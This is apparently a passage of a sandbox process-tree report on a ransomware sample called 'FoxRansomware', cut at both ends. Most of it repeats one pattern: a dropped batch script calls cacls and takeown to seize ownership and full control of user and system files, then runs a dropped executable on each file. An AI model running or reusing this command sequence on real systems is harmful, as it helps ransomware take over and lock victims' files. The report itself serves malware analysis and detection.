C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:3204
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:2260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:6340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:7448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:5756
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:3192
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:64
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:5256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:464
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:6580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C3⤵PID:5996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"3⤵PID:2392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000005.bin" -nobanner3⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000005.bin" -nobanner4⤵
- Executes dropped EXE
PID:6796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""2⤵PID:7608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C3⤵PID:1440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"3⤵PID:6868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000I.bin" -nobanner3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000I.bin" -nobanner4⤵
- Executes dropped EXE
PID:5916
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""2⤵PID:5132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C3⤵PID:6448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"3⤵PID:5064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000T.bin" -nobanner3⤵PID:6356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000T.bin" -nobanner4⤵
- Executes dropped EXE
PID:5396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""2⤵PID:3208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"3⤵PID:6480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000017.bin" -nobanner3⤵PID:2188
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000017.bin" -nobanner4⤵
- Executes dropped EXE
PID:2620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""2⤵PID:4840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C3⤵PID:5424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"3⤵PID:6272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006J.bin" -nobanner3⤵PID:6260
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000006J.bin" -nobanner4⤵PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl""2⤵PID:6316
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl" /E /G Admin:F /C3⤵PID:7228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl"3⤵PID:7184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl" -nobanner3⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl" -nobanner4⤵PID:7200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""2⤵PID:7292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C3⤵PID:7284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"3⤵PID:7400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000G.bin" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000G.bin" -nobanner4⤵PID:7680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""2⤵PID:7884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C3⤵PID:268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"3⤵PID:7396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000R.bin" -nobanner3⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000R.bin" -nobanner4⤵PID:7356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""2⤵PID:3744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C3⤵PID:7020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"3⤵PID:7924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000015.bin" -nobanner3⤵PID:300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000015.bin" -nobanner4⤵PID:7500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""2⤵PID:7976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C3⤵PID:8000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"3⤵PID:8076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006H.bin" -nobanner3⤵PID:7956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000006H.bin" -nobanner4⤵PID:7936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""2⤵PID:6984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C3⤵PID:6960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"3⤵PID:8172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000075.bin" -nobanner3⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000075.bin" -nobanner4⤵PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""2⤵PID:4232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C3⤵PID:2120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"3⤵PID:6948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000083.bin" -nobanner3⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000083.bin" -nobanner4⤵PID:6668
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""2⤵PID:6496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C3⤵PID:5896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"3⤵
- Modifies file permissions
PID:6684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000009F.bin" -nobanner3⤵PID:6696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000009F.bin" -nobanner4⤵PID:6860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""2⤵PID:7024
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C3⤵PID:6636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"3⤵PID:6504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AL.bin" -nobanner3⤵PID:4064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000AL.bin" -nobanner4⤵PID:6912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""2⤵PID:7096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C3⤵PID:5872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"3⤵
- Modifies file permissions
PID:6852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000B1.bin" -nobanner3⤵PID:2408
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000B1.bin" -nobanner4⤵PID:5652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""2⤵PID:5204
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C3⤵PID:5952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"3⤵PID:6464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftNotepad.xml" -nobanner3⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftNotepad.xml" -nobanner4⤵PID:3548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""2⤵PID:3668
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C3⤵PID:1288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"3⤵
- Modifies file permissions
PID:4532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner3⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner4⤵PID:6132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""2⤵PID:1000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C3⤵PID:7404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"3⤵PID:708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "NetworkPrinters.xml" -nobanner3⤵PID:2672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "NetworkPrinters.xml" -nobanner4⤵PID:3524
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin""2⤵PID:5024
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C3⤵PID:4292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"3⤵
- Modifies file permissions
PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007R.bin" -nobanner3⤵PID:2560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000007R.bin" -nobanner4⤵PID:2064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin""2⤵PID:2272
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C3⤵PID:4388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"3⤵PID:5304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000085.bin" -nobanner3⤵PID:1056
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000085.bin" -nobanner4⤵PID:1972
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin""2⤵PID:2128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C3⤵PID:7236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"3⤵PID:5596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008R.bin" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000008R.bin" -nobanner4⤵PID:5696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin""2⤵PID:4992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C3⤵PID:2808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"3⤵PID:4812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000009H.bin" -nobanner3⤵PID:4576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000009H.bin" -nobanner4⤵PID:6564
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin""2⤵PID:1696
-
